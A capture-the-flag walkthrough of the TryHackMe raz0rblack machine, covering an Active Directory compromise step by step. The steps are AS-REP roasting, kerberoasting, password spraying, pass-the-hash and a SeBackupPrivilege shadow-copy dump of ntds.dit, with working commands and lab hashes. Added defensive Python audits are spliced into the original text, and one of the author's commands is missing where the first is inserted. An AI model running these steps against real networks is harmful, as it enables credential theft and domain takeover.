raz0rblack by THM writeup

Greetings, dear kulhackers. This write-up is a walkthrough of the raz0rblack machine on TryHackMe

Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.

Step 0: Scan with Nmap

Traditionally, we start by scanning the network using Nmap

nmap -sC -sV -T4

-sC -> runs the default set of NSE scripts against the open ports
-sV -> determines the versions of services running on open ports
-T4 -> timing template (aggressive), which speeds up the scan

Scan result

Hmm, nothing remarkable so far. Let’s try to enumerate NFS

Network File System (NFS) is a distributed file system that provides users with access to files located on remote computers and allows them to work with these files in the same way as with local ones

nmap -sV --script=nfs* -p 111

The result of the Nmap script

Step 1: Use showmount

We can also find NFS using the utility showmount

showmount -e

Result of showmount request

Step 2: Mount /users

Create a mount point and mount the folder /users

mount -t nfs ./creds

Having looked at its contents, we will see two files

The .txt file contains a flag, and the .xlsx file contains a list of users


Step 3: Use GetNPUsers

To test these users for accounts that do not require Kerberos pre-authentication (AS-REP roasting), we will use the module GetNPUsers from the utility Impacket

GetNPUsers raz0rblack.thm/ -userfile /root/users.txt -dc-ip

The utility returns an AS-REP for the user twilliams, which we can crack offline

Step 4: Brute force using JohnTheRipper

Having obtained the AS-REP, we can launch an offline brute force to recover the password in clear text. Let’s use the utility JohnTheRipper

john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Step 5: Use CrackMapExec

Knowing the account information, let’s run crackmapexec to enumerate users using RID brute force

crackmapexec smb -u twilliams -p roastpotatoes --rid-brute

As a result, we obtain new valid users for the next steps: xyan1d3, lvetrova, sbradley

Let’s use crackmapexec again to spray the password against these users

Step 6: Use smbpasswd to change the password

As you can see, the user sbradley has the status STATUS_PASSWORD_MUST_CHANGE. To change the password, use the utility smbpasswd

smbpasswd -r -U sbradley

-r -> option to specify the address of the remote machine
-U -> option to specify user

Step 7: Use SMBMap

Next we will use the utility SMBMap

SMBMap allows users to enumerate SMB shares across an entire domain. The program lists the shares, the access rights on them and their contents, has upload/download functionality, can automatically download files whose names match a pattern, and can even execute commands remotely. This tool was created for penetration testing and is designed to make it easier to find potentially sensitive data in large networks

smbmap -H -u sbradley -p password

As a result, we will see a list of available shares. The one of interest is /trash

Step 8: Connect via smbclient

To view potentially interesting files, connect via smb using smbclient

smbclient // --user="sbradley%password"

Let’s download the available files. These will include a password-protected archive

Step 9: Use zip2john

To crack the archive password, we will use the utilities zip2john and JohnTheRipper

zip2john experiment_gone_wrong.zip > zip_hash.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

Having received the password in clear text, unpack the archive, which contains system.hive and ntds.dit

Step 10: Retrieving secrets from files

To locally extract user secrets we will use the module secretsdump from the utility Impacket

impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL > dump.txt

To separate hashes from a file, use the following command
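Separately from that command, here is an added example (not the author's command and not part of the original write-up) that audits a dump in the secretsdump output format (domain\user:rid:lmhash:nthash:::) for the credential-hygiene problems a defender would look for in the same data: accounts with an empty password, accounts that still have a legacy LM hash stored, and password reuse across accounts. The sample dump is constructed; every hash except the two well-known empty-password constants is a placeholder, and the example.thm domain and account names are hypothetical.

```python
"""Credential-hygiene audit over an NTDS dump in secretsdump output format.
Added defensive example; SAMPLE_DUMP is constructed, and all hashes except
the two well-known empty-password constants are placeholders."""
import re
from collections import defaultdict

# Well-known LM and NT hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's NTDS format (hypothetical domain and users).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4:::
example.thm\\jdoe:1104:aad3b435b51404eeaad3b435b51404ee:b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2:::
example.thm\\asmith:1105:aad3b435b51404eeaad3b435b51404ee:b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2:::
example.thm\\svc_legacy:1106:f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6f6:e5e5e5e5e5e5e5e5e5e5e5e5e5e5e5e5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""

# One hash line: user, numeric RID, 32-hex LM hash, 32-hex NT hash, trailing ':::'.
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Return one dict per hash line; status lines and Kerberos-key lines are skipped."""
    records = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            records.append(match.groupdict())
    return records


def empty_password_accounts(records):
    """Accounts whose NT hash is the hash of the empty string."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def lm_hash_accounts(records):
    """Accounts with a real LM hash stored: the legacy LM algorithm is
    case-insensitive and split into two 7-character halves, so it is cheap to crack."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


def shared_nt_hashes(records, ignore_empty=True):
    """Group accounts that share an NT hash, i.e. the same password."""
    by_hash = defaultdict(list)
    for r in records:
        if ignore_empty and r["nt"] == EMPTY_NT:
            continue
        by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def audit_dump(text):
    """Run all three checks and return a summary dict."""
    records = parse_dump(text)
    return {
        "accounts": len(records),
        "empty_password": empty_password_accounts(records),
        "lm_hash_present": lm_hash_accounts(records),
        "password_reuse": shared_nt_hashes(records),
    }


if __name__ == "__main__":
    for key, value in audit_dump(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

The Kerberos-key lines that secretsdump appends use a different field layout, which is why the regex requires a numeric RID and exactly two 32-character hex fields; anything else is skipped rather than misparsed.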

Step 11: CrackMapExec to find a suitable hash

To find which of the dumped hashes belongs to the user lvetrova, let’s use the utility crackmapexec again

crackmapexec smb -u lvetrova -H hashes.txt

Step 12: Evil-WinRM

For remote connection we will use Evil-WinRM

evil-winrm -i -u lvetrova -H f220d3988deb3f516c73f40ee16c431d

Having looked at the contents of the user’s folder, we will see the file lvetrova.xml

PowerShell has a mechanism for storing encrypted credentials that can only be read back by the user account that saved them: it prompts for credentials and stores them encrypted in an XML file. lvetrova.xml was produced this way, and decrypting it as that user gives us the user flag lvetrova

Step 13: Conduct kerberoasting

Next, knowing the username and the hash of the user’s password, we will carry out a Kerberoasting attack using GetUserSPNs, requesting TGS tickets for accounts with SPNs

GetUserSPNs -dc-ip raz0rblack.thm/lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile kerb.txt

With the TGS obtained, we use john again for offline password cracking

john --rules --wordlist=/usr/share/wordlists/rockyou.txt kerb.txt
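Both Kerberos attacks on this page leave traces on the domain controller: the AS-REP roast from Step 3 shows up as Security event 4768 with Pre-Authentication Type 0, and the Kerberoasting here as event 4769 requesting an RC4 (0x17) service ticket for a user account that has an SPN. The following added example, not part of the original write-up, triages such events. The sample events are constructed in a simplified key=value form rather than a real export, the IP addresses and the DC01$ computer account are hypothetical, and the account names are taken from this write-up.

```python
"""Triage of Windows Security events for AS-REP roasting (4768) and
Kerberoasting (4769). Added defensive example; SAMPLE_EVENTS is constructed
in a simplified key=value form, and the IP addresses are hypothetical."""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    # 4768 = TGT request. PreAuthType 0 means the KDC issued the AS-REP with no
    # pre-authentication, i.e. the account has "Do not require Kerberos preauthentication".
    "EventID=4768 TargetUserName=twilliams PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=lvetrova PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=sbradley PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.20",
    # 4769 = service ticket request. An RC4 (0x17) ticket for a user service
    # account is the Kerberoasting signature; AES (0x12) is the modern default.
    "EventID=4769 TargetUserName=lvetrova ServiceName=xyan1d3 TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=lvetrova ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=sbradley ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.10.10.20",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value line into a dict of field name -> value."""
    return dict(FIELD_RE.findall(line))


def asrep_roast_candidates(events):
    """Accounts for which a TGT was issued without pre-authentication."""
    return sorted({e["TargetUserName"] for e in events
                   if e.get("EventID") == "4768" and e.get("PreAuthType") == "0"})


def kerberoast_candidates(events):
    """RC4 service-ticket requests per source IP, ignoring computer accounts
    (names ending in $) and krbtgt, which are normal ticket traffic."""
    hits = defaultdict(set)
    for e in events:
        if e.get("EventID") != "4769":
            continue
        service = e.get("ServiceName", "")
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        if e.get("TicketEncryptionType", "").lower() == "0x17":
            hits[e.get("IpAddress", "?")].add((e.get("TargetUserName", "?"), service))
    return {ip: sorted(pairs) for ip, pairs in hits.items()}


def triage_kerberos(lines):
    """Run both checks over raw event lines and return the findings."""
    events = [parse_event(line) for line in lines]
    return {
        "asrep_roastable": asrep_roast_candidates(events),
        "kerberoast_by_source": kerberoast_candidates(events),
    }


if __name__ == "__main__":
    for name, result in triage_kerberos(SAMPLE_EVENTS).items():
        print(f"{name}: {result}")
```

A single 4768 without pre-authentication only proves the account is misconfigured, and legacy clients can legitimately negotiate RC4, so the signal worth alerting on is the combination: one source host both obtaining an AS-REP with no pre-auth and requesting RC4 tickets for user service accounts, as 10.10.14.5 does in the constructed sample.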

Step 14: Evil-WinRM with xyan1d3 data

evil-winrm -i -u xyan1d3 -p cyanide9amine5628
whoami /all

The user has the SeBackupPrivilege privilege. It was designed to let backup software create backup copies of users’ files, and it bypasses any ACLs the administrator has set on the network. In a nutshell, this privilege allows the user to read any file on the entire file system, which may include sensitive files such as the SAM database or the SYSTEM registry hive. From an attacker’s perspective, once a foothold is gained and an elevated shell obtained, this privilege can be exploited to read those files and possibly crack the passwords of highly privileged users on the system or network
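Because the privilege is that powerful, a defender wants to know exactly who holds it. As an added example (not part of the write-up), the following audit parses the [Privilege Rights] section of a policy file in the format written by secedit /export and flags every principal holding SeBackupPrivilege or SeRestorePrivilege outside the default domain-controller baseline (Administrators, Backup Operators, Server Operators). The export excerpt is constructed, the S-1-5-21-... SID stands for a hypothetical domain account, and the baseline is an assumption to adjust for member servers, where Server Operators does not exist.

```python
"""Audit of SeBackupPrivilege / SeRestorePrivilege holders from a secedit-style
[Privilege Rights] export. Added defensive example; SECEDIT_EXPORT is a
constructed excerpt and the S-1-5-21-... SID is hypothetical."""
import configparser

# Constructed excerpt of what `secedit /export /cfg <file>` produces, already
# decoded from UTF-16 to text. secedit prefixes each SID with '*'.
SECEDIT_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-549,*S-1-5-21-1111111111-2222222222-3333333333-1106
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-549
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Built-in groups that hold the backup/restore privileges by default on a
# domain controller. Assumed baseline: drop Server Operators for member servers.
DEFAULT_DC_BASELINE = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-551": "Backup Operators",
    "S-1-5-32-549": "Server Operators",
}


def privilege_holders(export_text, privilege):
    """Return the SIDs assigned to `privilege`, without secedit's leading '*'."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep privilege names case-sensitive
    parser.read_string(export_text)
    raw = parser.get("Privilege Rights", privilege, fallback="")
    return [entry.strip().lstrip("*") for entry in raw.split(",") if entry.strip()]


def unexpected_holders(export_text, privilege, baseline=DEFAULT_DC_BASELINE):
    """SIDs outside the baseline. Each one can read any file regardless of its ACL
    (SeBackupPrivilege) or overwrite any file (SeRestorePrivilege), so each needs
    a documented justification."""
    return [sid for sid in privilege_holders(export_text, privilege) if sid not in baseline]


def audit_privileges(export_text):
    """Audit both privileges and return the unexpected holders of each."""
    return {
        privilege: unexpected_holders(export_text, privilege)
        for privilege in ("SeBackupPrivilege", "SeRestorePrivilege")
    }


if __name__ == "__main__":
    for privilege, sids in audit_privileges(SECEDIT_EXPORT).items():
        print(f"{privilege}: {sids or 'baseline only'}")
```

The export lists direct assignments only, so an account that obtained the privilege through membership in Backup Operators or Server Operators will not appear here; review the membership of the baseline groups alongside this output.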

To implement the privilege escalation, we need the utility diskshadow.exe, a script for it, and two DLLs: SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll

Let’s also create the following script to perform shadow copying and call it diskshadow.txt:

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

set verbose onX -> outputs detailed execution information
set metadata -> specifies the location of the metadata file for the shadow copy

set context persistentX -> makes the shadow copy persistent, so it survives exiting Diskshadow and a computer reboot

begin backupX -> starts the shadow copy process

add volume C: alias cdriveX -> adds the C: volume to the shadow copy set and gives its shadow ID the alias cdrive

createX -> creates the shadow copy of the added volumes

expose %cdrive% E:X -> exposes the shadow copy to the operating system and assigns it the drive letter E:

end backupX -> ends the shadow copy process

Load the script using the command:

upload diskshadow.txt

We also need the two DLLs, which can be downloaded from here:

wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll

and uploaded to the target with the upload command. After uploading the DLLs, load them into the PowerShell session:

import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll

Having completed all the procedures, we launch our script through the utility diskshadow.exe

diskshadow.exe /s C:\tmp\diskshadow.txt

/s -> specifies the path to the script

After successfully creating a shadow copy, use the utility robocopy

robocopy /b E:\windows\ntds . ntds.dit

/b -> copies files in backup mode, which allows Robocopy to override file and folder permissions (ACLs). This lets you copy files you would otherwise have no access to, as long as Robocopy runs under an account with sufficient privileges

After that, copy the registry hive SYSTEM via the reg save command and download our files

reg save HKLM\SYSTEM C:\tmp\system

Step 15: Get the credentials again

After downloading the files ntds.dit and system, let’s make a local dump of secrets from them using secretsdump

impacket-secretsdump -system system -ntds ntds.dit LOCAL

Step 16: Connect with admin credentials

Having received the administrator hash, we will connect using the same evil-winrm

evil-winrm -i -u administrator -H 9689931bed40ca5a2ce1218210177f0c

Let’s view the contents of the administrator folder

Using type, let’s open the file root.xml

This is our flag. Convert from hex to plain text:

Here is your Root Flag

Let’s also find the user flag twilliams

And the final touch: after looking through all the folders, we will find the directory Top Secret, see a picture there and download it

That’s all we wanted to show in this analysis. Remember: there are no 100% resistant systems. Practice, because no pentester gets anywhere without it!
